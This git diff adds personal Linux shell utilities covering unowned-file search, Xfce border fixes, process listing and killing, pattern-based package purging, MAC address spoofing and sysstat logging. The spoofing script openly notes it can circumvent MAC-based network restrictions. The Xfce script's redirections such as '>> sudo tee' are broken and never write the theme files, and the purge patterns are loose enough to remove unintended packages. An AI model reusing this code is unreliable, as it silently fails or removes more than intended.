b/scripts/file-and-dirs-owner.sh new file mode 100644 index 0000000..f5c9938 --- /dev/null +++ b/scripts/file-and-dirs-owner.sh @@ -0,0 +1,94 @@ +########################################################### +# List files and directories which are not owned by any package in a Debian system +# Scripted by Fincer (~Pekka Helenius), 2017 + +echo -e "\nSearch for files & folders which are not owned by any installed package.\n" + +if [[ $# -eq 0 ]]; then + read -r -p "Folder path: " BASEDIR + #Substitute $ symbol from environmental variables for printenv input + if [[ $BASEDIR == *"$"* ]]; then + BASEDIR=$(echo $(printenv $(echo ${BASEDIR} | sed 's/\$//g'))) + fi +else + BASEDIR=$1 +fi + +if [[ ! $(file --mime-type "${BASEDIR}" | grep "inode/directory" | wc -l) -eq 1 ]]; then + echo "ERROR: Use full folder path as an input value!" +elif [[ $# -gt 1 ]]; then + echo "ERROR: Only one argument accepted!" +else + + echo -e "Search depth:\n1 = "${BASEDIR}"\n2 = "${BASEDIR}" & subfolders\n3 = "${BASEDIR}", subfolders & 2 folder levels below\n4 = no limit\n" + read -r -p "Which depth value you prefer? [Default: 1] " response + + case $response in + 1) + depth="-maxdepth 1 " + depthstr="${BASEDIR}" + ;; + 2) + depth="-maxdepth 2 " + depthstr="${BASEDIR} and subfolders" + ;; + 3) + depth="-maxdepth 3 " + depthstr="${BASEDIR}, subfolders and 2 folder levels below" + ;; + 4) + depth="" + depthstr="${BASEDIR} and all subfolders" + ;; + *) + echo -e "\nUsing default value [1]" + depth="-maxdepth 1 " + depthstr="${BASEDIR}" + esac + + echo -e "\nSearching unowned files in $depthstr\n" + + function counter() { + i=0 + n=1 + COUNT=$(echo "$DATASET" | wc -l) + IFS=$'\n' + for data in $DATASET; do + + echo -ne "Scanning $data_name $n ($(( 100*$n/$COUNT ))%) of all $type ($COUNT) in $depthstr\r" + + if [[ $(dpkg -S "${data}" &>/dev/null || echo "no path found matching pattern" | wc -l) -eq 1 ]]; then + DATA_ARRAY[$i]="$(( $i + 1)) - ${data}" + let i++ + fi + let n++ + + done + unset IFS + if [[ $i -gt 0 ]]; then + echo -e "\nThe following $i of $COUNT $type is not owned by any installed package in $depthstr:\n" + IFS=$'\n' + echo -e "${DATA_ARRAY[*]}\n" + unset IFS + unset DATA_ARRAY + else + echo -e "\nAll $type are owned by system packages in $depthstr.\n" + fi + } + + function files() { + DATASET=$(find "${BASEDIR}" ${depth} -type f) + type="files" + data_name="file" + counter + } + + function folders() { + DATASET=$(find "${BASEDIR}" ${depth} -type d) + type="folders" + data_name="folder" + counter + } + + files; folders +fi diff --git a/scripts/fix-xfce4-mousefocus-window-edges.sh b/scripts/fix-xfce4-mousefocus-window-edges.sh new file mode 100644 index 0000000..2b18a57 --- /dev/null +++ b/scripts/fix-xfce4-mousefocus-window-edges.sh @@ -0,0 +1,112 @@ +#!/bin/bash + +# XFCE4: IMPROVE WINDOW BORDER MOUSE SNAP BY INCREASING EDGE SIZE +# APPLIES TO STYLE 'Numix' (Whisker menu -> Settings -> Appearance -> Style) +# +# This topic has been discussed here: https://github.com/numixproject/numix-gtk-theme/issues/100 +# +# The main issue in Xfce4 desktop usage is window border/edge size which is 1 px by default +# This makes it very annoying and difficult to grab a window edge with mouse cursor +# This modification should be applied to source files but can be done by +# modifying installed style files, too (which this script does) + +# These modifications are proposed here: +# https://github.com/MaxKh/numix-gtk-theme/commit/6057a2d907a2e3014ae9e268e1aed8dc819a55c8 + +################################################################## + +sudo echo -e "\ +/* XPM */\n \ +static char * bottom_active_xpm[] = {\n \ +\"8 5 3 1\",\n \ +\" \tc None\",\n \ +\".\tc #444444\",\n \ +\"#\tc #484848\",\n \ +\"........\",\n \ +\"........\",\n \ +\"........\",\n \ +\"........\",\n \ +\"########\"};" \ +>> sudo tee /usr/share/themes/Numix/xfwm4/bottom-active.xpm + +################################################################## + +sudo echo -e "\ +/* XPM */\n \ +static char * bottom_inactive_xpm[] = {\n \ +\"8 5 3 1\",\n \ +\" \tc None\",\n \ +\".\tc #444444\",\n \ +\"#\tc #393939\",\n \ +\"........\",\n \ +\"........\",\n \ +\"........\",\n \ +\"........\",\n \ +\"########\"};" \ +>> sudo tee /usr/share/themes/Numix/xfwm4/bottom-inactive.xpm + +################################################################## + +sudo echo -e "\ +/* XPM */\n \ +static char * bottom_left_active_xpm[] = {\n \ +\"24 5 3 1\",\n \ +\" \tc None\",\n \ +\".\tc #444444\",\n \ +\"#\tc #484848\",\n \ +\"#.......................\",\n \ +\"#.......................\",\n \ +\"#.......................\",\n \ +\"#.......................\",\n \ +\"########################\"};" \ +>> sudo tee /usr/share/themes/Numix/xfwm4/bottom-left-active.xpm + +################################################################## + +sudo echo -e "\ +/* XPM */\n \ +static char * bottom_left_inactive_xpm[] = {\n \ +\"24 5 3 1\",\n \ +\" \tc None\",\n \ +\".\tc #444444\",\n \ +\"#\tc #393939\",\n \ +\"#.......................\",\n \ +\"#.......................\",\n \ +\"#.......................\",\n \ +\"#.......................\",\n \ +\"########################\"};" \ +>> /usr/share/themes/Numix/xfwm4/bottom-left-inactive.xpm + +################################################################## + +sudo echo -e "\ +/* XPM */\n \ +static char * bottom_right_active_xpm[] = {\n \ +\"24 5 3 1\",\n \ +\" \tc None\",\n \ +\".\tc #444444\",\n \ +\"#\tc #484848\",\n \ +\".......................#\",\n \ +\".......................#\",\n \ +\".......................#\",\n \ +\".......................#\",\n \ +\"########################\"};" \ +>> /usr/share/themes/Numix/xfwm4/bottom-right-active.xpm + +################################################################## + +sudo echo -e "\ +/* XPM */\n \ +static char * bottom_right_inactive_xpm[] = {\n \ +\"24 5 3 1\",\n \ +\" \tc None\",\n \ +\".\tc #444444\",\n \ +\"#\tc #393939\",\n \ +\".......................#\",\n \ +\".......................#\",\n \ +\".......................#\",\n \ +\".......................#\",\n \ +\"########################\"};" \ +>> /usr/share/themes/Numix/xfwm4/bottom-right-inactive.xpm + +################################################################## diff --git a/scripts/list-commands-of-a-package.sh b/scripts/list-commands-of-a-package.sh new file mode 100644 index 0000000..690821a --- /dev/null +++ b/scripts/list-commands-of-a-package.sh @@ -0,0 +1,51 @@ +#!/bin/bash + +# SCRIPT DESCRIPTION: +# This bash script lists all commands/executables included in a package defined in PACKAGES array below. + +################################################### +# System packages to look for commands in: +PACKAGES=(coreutils findutils util-linux) + +# Debian-specific command syntax for listing files belonging to a package +# This syntax does not apply in other Linux distributions using other than dpkg solutions. +LIST_COMMAND='dpkg -L' + +################################################### + +# Loop through each package listed in PACKAGES bash array above +# For each package, use another loop to go through each file listed in pathes defined by file mimetype +# +for pkg in ${PACKAGES[*]}; do + for file in $($LIST_COMMAND $pkg); do + + WHATBIN=$(file --mime-type $file | grep x\-sharedlib | awk -F ":" '{print $1}' | sed '/\.so/d' | awk -F '/' '{print $(NF)}') + + # whatis command gets confused with an empty input. Avoid these situations. + if [[ ! -z $WHATBIN ]]; then + whatis $WHATBIN | sed 's/([0-9a-zA-Z])//' + fi + + done +done | sort + +################################################### +## DEPRECATED +## All bin folders listed in PATH global variable. +## Remove quotation marks with sed +## Replace : with |\ for grep command +## Add each directory path into the exdirs array +## Start from array index 0 (dirnum) and increase the number in the loop with 'let dirnum++' command +## +#dirnum=0 +#for exdir in $(export -p | grep 'declare -x PATH' | awk -F '=' '{print $2}' | sed 's/"//g' | tr ':' '|\'); do +# exdirs[$dirnum]=$exdir +# let dirnum++ +#done +## DEPRECATED + +## DEPRECATED +# for cmd in $($LIST_COMMAND $pkg | grep -E "${exdirs[*]}" | awk -F '/' '{print $(NF)}'); do +# whatis $cmd | sed 's/([0-9a-zA-Z])//' +# done | sort +## DEPRECATED \ No newline at end of file diff --git a/scripts/processid.sh b/scripts/processid.sh new file mode 100644 index 0000000..3d209a8 --- /dev/null +++ b/scripts/processid.sh @@ -0,0 +1,29 @@ +#!/bin/sh + +# Usage example: sh processid.sh kate dolphin gnome-terminal +# Loop through each input value +# +for PID in $@; do + PROCESSPRNT=$(ps l -C $PID | awk '{print $3}' | tail -n +2) + + if [[ $(echo $PROCESSPRNT | wc -w) -ne 0 ]]; then + echo -e "\n'$PID': All process IDs (PID) are:\n\n$PROCESSPRNT\n" + echo -e "Total: $(echo $PROCESSPRNT | wc -w)\n" + else + echo -e "\n'$PID': No process found running.\n" + fi +done + +#### +#DEPRECATED + +# Array of processes +#BIN_PATTERN=( +#dolphin +#gigole +#) + +#for PID in ${BIN_PATTERN[*]}; do + +#DEPRECATED +#### diff --git a/scripts/processid_kill.sh b/scripts/processid_kill.sh new file mode 100644 index 0000000..0d9a19c --- /dev/null +++ b/scripts/processid_kill.sh @@ -0,0 +1,14 @@ +#!/bin/sh + +# Kills all matching processes +# +# Usage: sh processid_kill.sh process1 process2 process3 ... +# +for PIDS in $(ps l -C $@ | awk '{print $3}' | tail -n +2); do + for PID in $(echo $PIDS); do + kill $PID + done +done + +# TODO: ignore case. For example, if user input is 'Vlc', ignore case and find process 'vlc' instead. +# This can be done with grep diff --git a/scripts/remove-multiple-pkgs-in-debian.sh b/scripts/remove-multiple-pkgs-in-debian.sh new file mode 100644 index 0000000..c45f3b5 --- /dev/null +++ b/scripts/remove-multiple-pkgs-in-debian.sh @@ -0,0 +1,10 @@ +#!/bin/sh + +# Package patterns to search +PKG_PATTERN="onboard|ristretto|catfish|notes|libreoffice|transmission|sudoku|mines|scan|mugshot|screenshooter|firefox" + +# Removal of the found packages +sudo apt-get purge --remove $(dpkg --get-selections |grep -E $PKG_PATTERN | awk '{print $1}' | tr '\n' ' ') + +# Cleanup +sudo apt-get autoremove diff --git a/scripts/spoof_mac_address.sh b/scripts/spoof_mac_address.sh new file mode 100644 index 0000000..7ae2179 --- /dev/null +++ b/scripts/spoof_mac_address.sh @@ -0,0 +1,174 @@ +#!/bin/bash + +# Easily set up a spoofed MAC address to a network interface on systemd-based Linux systems. +# Based on: https://wiki.archlinux.org/index.php/MAC_address_spoofing#Method_1:_systemd-networkd + +# Copyright: Pekka Helenius (~Fincer), 2018 + +# Randomizing/Modifying MAC address may disturb malicious ARP scans (device idenfitication) and may help circumventing MAC-based restrictions which may be present on the local network. +# Use only at your own risk. Spoofing MAC address may not be accepted in all situations, may be illegal and may cause legal troubles. You have been warned. + +#genmac() { + + trap ctrl_c INT + + function ctrl_c() { + echo -e "\nAborting.\n" + exit + #return + } + + random_mac() { + # Author: Aaron Toponce + # https://serverfault.com/questions/299556/how-to-generate-a-random-mac-address-from-the-linux-command-line/631119#631119 + MAC=$(printf '%02x' $((0x$(od /dev/urandom -N1 -t x1 -An | cut -c 2-) & 0xFE | 0x02)); od /dev/urandom -N5 -t x1 -An | sed 's/ /:/g') + } + + insert_mac() { + echo -e "\nChanging MAC address information (root permission required).\n" + + sudo sed -i "/\[Link\]/!b;n;cMACAddress=$MAC" /etc/systemd/network/00-default.link + echo -e "MAC address changed from '$MAC_OLD' to '$MAC' for interface '$MAC_DEVICE'.\n\nPlease restart this interface to apply the changes.\n\nTo restore original MAC address, either delete configuration file '/etc/systemd/network/$linkname' or set real MAC address manually into it.\n" + exit 0 + #return 0 + } + + geninsert_mac() { + + gennew_mac() { + + while true; do + unset response + read -r -p "Generate a new MAC address? [Y/n] " response + + if [[ $(echo $response | sed 's/ //g') =~ ^([yY][eE][sS]|[yY])$ ]]; then + random_mac + newname_mac + else + echo -e "\nKeeping old MAC address configuration.\n" + exit + #return + fi + done + } + + newname_mac() { + unset response + read -r -p "New MAC address for '$MAC_DEVICE' will be '$MAC'. Accept? [Y/n] " response + + if [[ $(echo $response | sed 's/ //g') =~ ^([yY][eE][sS]|[yY])$ ]]; then + insert_mac + else + gennew_mac + fi + } + newname_mac + } + + gen_mac() { + + real_mac() { + + AVAILABLE_MACS=$(ip -br link show | sed '/LOOPBACK/d' | awk '{print NR"\t"$1"\t"$3"\t"$2}') + + IFS=$'\n' + + echo -e "\nAvailable network interfaces with their MAC addresses are:\n\n${AVAILABLE_MACS[*]}" + + echo -e "\nPlease select the interface which MAC address you want to spoof of\n" + read -r -p "Selection [number]: " number + + if [[ ! $number =~ ^[0-9]+$ ]]; then + echo -e "\nInvalid input value. Aborting.\n" + exit 1 + #return 1 + fi + + for INTERFACE in $(echo -e "${AVAILABLE_MACS[*]}"); do + + intf_num=$(echo $INTERFACE | awk '{print $1}') + + if [[ $number -eq $intf_num ]]; then + MAC_REAL=$(echo $INTERFACE | awk '{print $3}') + MAC_DEVICE=$(echo $INTERFACE | awk '{print $2}') + break + fi + done + unset IFS + + if [[ $MAC_REAL == "" ]]; then + echo -e "\nNot a valid MAC address found for interface number $number. Aborting.\n" + exit 1 + #return 1 + fi + + } + + real_mac + + PREV_CONF=$(grep -Ril "$MAC_REAL" /etc/systemd/network/ | grep -E "[0-9]{,2}\-default\.link$") + + if [[ ! $(echo $PREV_CONF | wc -w) -eq 0 ]]; then + echo -e "\nUsing existing configuration file for interface '$MAC_DEVICE':\n$PREV_CONF\n" + linkname=$(basename $PREV_CONF) + MAC_OLD=$(awk -F= '/\[Link\]/{getline; print $2}' $PREV_CONF) + else + MAC_OLD=$MAC_REAL + echo -e "\nPrevious configuration file not found. Creating it (root permission required).\n" + read -r -p "Configuration file name? (must follow syntax: 00-default.link, 41-default.link, 98-default.link etc.): " linkname + + if [[ "$linkname" =~ ^[0-9]{,2}\-default\.link$ ]]; then + + if [[ ! $(sudo -n true) ]]; then + sudo echo "" + fi + + echo -e "[Match]\nMACAddress=$MAC_REAL\n\n[Link]\nMACAddress=$MAC_REAL\nNamePolicy=kernel database onboard slot path" \ + | sudo tee /etc/systemd/network/$linkname > /dev/null + + echo -e "Created new configuration file: /etc/systemd/network/$linkname\n" + else + echo -e "\nInvalid file name given. Aborting.\n" + exit 1 + fi + fi + + unset response + echo -e "Either randomly generated or manually specified MAC address can be used.\n" + read -r -p "Do you want to use randomly generated MAC address? [Y/n] " response + + if [[ $(echo $response | sed 's/ //g') =~ ^([yY][eE][sS]|[yY])$ ]]; then + random_mac + geninsert_mac + else + + if [[ $(echo $response | sed 's/ //g') =~ ^([nN][oO]|[nN])$ ]]; then + read -r -p "Please type a new MAC address (Syntax is e.g. aa:bb:33:zz:f0:4a): " MAC + maxtries=5 + while [[ $maxtries -gt 0 ]]; do + + case "$MAC" in + [[:xdigit:]][[:xdigit:]]:[[:xdigit:]][[:xdigit:]]:[[:xdigit:]][[:xdigit:]]:[[:xdigit:]][[:xdigit:]]:[[:xdigit:]][[:xdigit:]]:[[:xdigit:]][[:xdigit:]]) + insert_mac + ;; + esac + unset MAC + read -r -p "Invalid MAC address given. Please type again ($maxtries tries left): " MAC + let maxtries-- + done + else + echo -e "\nInvalid answer. Aborting.\n" + fi + fi + } + + echo -e "\nWARNING: Changing MAC address WILL DISRUPT connections to any network device using MAC-based authentication methods. These devices may include configured routers, WiFi hotspots etc. Remember to write down the new MAC address, and make sure you are authorized to configure the MAC address to all affected network devices if needed.\n" + read -r -p "You are going to spoof a MAC address of this computer. Are you sure? [Y/n] " response + + if [[ $(echo $response | sed 's/ //g') =~ ^([yY][eE][sS]|[yY])$ ]]; then + gen_mac + else + echo -e "\nKeeping old MAC address configuration.\n" + fi + +#} diff --git a/scripts/sysstat_command.sh b/scripts/sysstat_command.sh new file mode 100644 index 0000000..31a51fe --- /dev/null +++ b/scripts/sysstat_command.sh @@ -0,0 +1,117 @@ +#!/bin/bash + +# Author: Pekka Helenius (~Fincer), 2018 +# Collect system statistics at regular intervals + +# Check if the following file exists. If not, exit the script. +[[ $(ls /etc/default/sysstat) ]] || exit + +# Enable stats +[[ $(cat /etc/default/sysstat | grep "ENABLED=\"true\"") ]] || sudo sed -i 's/ENABLED.*/ENABLED="true"/' /etc/default/sysstat + +# How many days we take stats +DAYS=2 +DATE_INTERVAL=$(echo $(date +%Y-%m-%d)_$(date +%Y-%m-%d -d "+$DAYS days")) + +# Interval of stats in seconds +INTERVAL=20 + +# Logs dir +SARDIR=$HOME/sar_statistics +SARSTAT_FILE=$SARDIR/sar_stats_$DATE_INTERVAL.file +PIDSTAT_DIR=$SARDIR/pidstats + +############## +[[ -d $PIDSTAT_DIR ]] || mkdir -p $PIDSTAT_DIR +DAYS_SEC=$(( DAYS * 60 * 60 * 24)) +COUNT=$(( DAYS_SEC / INTERVAL )) +############## + +# Ignore HANGUP signal. By setting this, we continue running commands presented below though this script has exited +# Alternatively, use 'nohup' before any command execution. NOTE: 'nohup' doesn't work with functions +trap "" HUP + +# Gather data for analysis +# alternatively use 'nohup' as a prefix for this command +sar $INTERVAL $COUNT -o $SARSTAT_FILE &>/dev/null & +disown + +########################################## +# How to print out statistics? + +# CPU +# sar -u -f $SARSTAT_FILE + +# Memory +# sar -r -f $SARSTAT_FILE + +# Mounted filesystems +# sar -F MOUNT / -f $SARSTAT_FILE + +# Swap space stats +# sar -S -f $SARSTAT_FILE + +# Network devices +# sar -n DEV -f $SARSTAT_FILE + +# Network devices - errors +# sar -n EDEV -f $SARSTAT_FILE + +# Network IPv4 sockets +# sar -n SOCK -f $SARSTAT_FILE + +# Network IPv6 sockets +# sar -n SOCK6 -f $SARSTAT_FILE + +# Network IPv4 traffic statistics +# sar -n IP -f $SARSTAT_FILE + +# Network IPv4 traffic statistics - errors +# sar -n EIP -f $SARSTAT_FILE + +# Network IPv6 traffic statistics +# sar -n IP6 -f $SARSTAT_FILE + +# Network IPv6 traffic statistics - errors +# sar -n EIP6 -f $SARSTAT_FILE + +# Network TCP protocol statistics +# sar -n TCP -f $SARSTAT_FILE + +# Network TCP protocol statistics - errors +# sar -n ETCP -f $SARSTAT_FILE + +# Inode, file etc. stats +# sar -v -f $SARSTAT_FILE + +# Tasks statistics +# sar -w -f $SARSTAT_FILE + +########################################## +# Pidstat + +function pidstats() { + while [[ $DAYS_SEC -ge 0 ]]; do + + pidstat -d >> $PIDSTAT_DIR/pidstat_stats_io_$DATE_INTERVAL + # pidstat -R >> $PIDSTAT_DIR/pidstat_stats_realtime_$DATE_INTERVAL + pidstat -r >> $PIDSTAT_DIR/pidstat_stats_pagefaults_$DATE_INTERVAL + pidstat -s >> $PIDSTAT_DIR/pidstat_stats_stacks_$DATE_INTERVAL + pidstat -u >> $PIDSTAT_DIR/pidstat_stats_cpu-tasks_$DATE_INTERVAL + pidstat -v >> $PIDSTAT_DIR/pidstat_stats_kerneltables_$DATE_INTERVAL + + # We want to interrupt this loop if previous pidstat commands fail. + if [[ ! $? == 0 ]]; then + break 1 + fi + + DAYS_SEC=$(( DAYS_SEC - INTERVAL )) + sleep $INTERVAL + + done + +} + +pidstats & +echo -e "Collecting statistics with 'sar' and 'pidstat' commands for the following $DAYS days. All commands will stop at $(date '+%H:%M on %Y-%m-%d' -d '+2 days')." +disown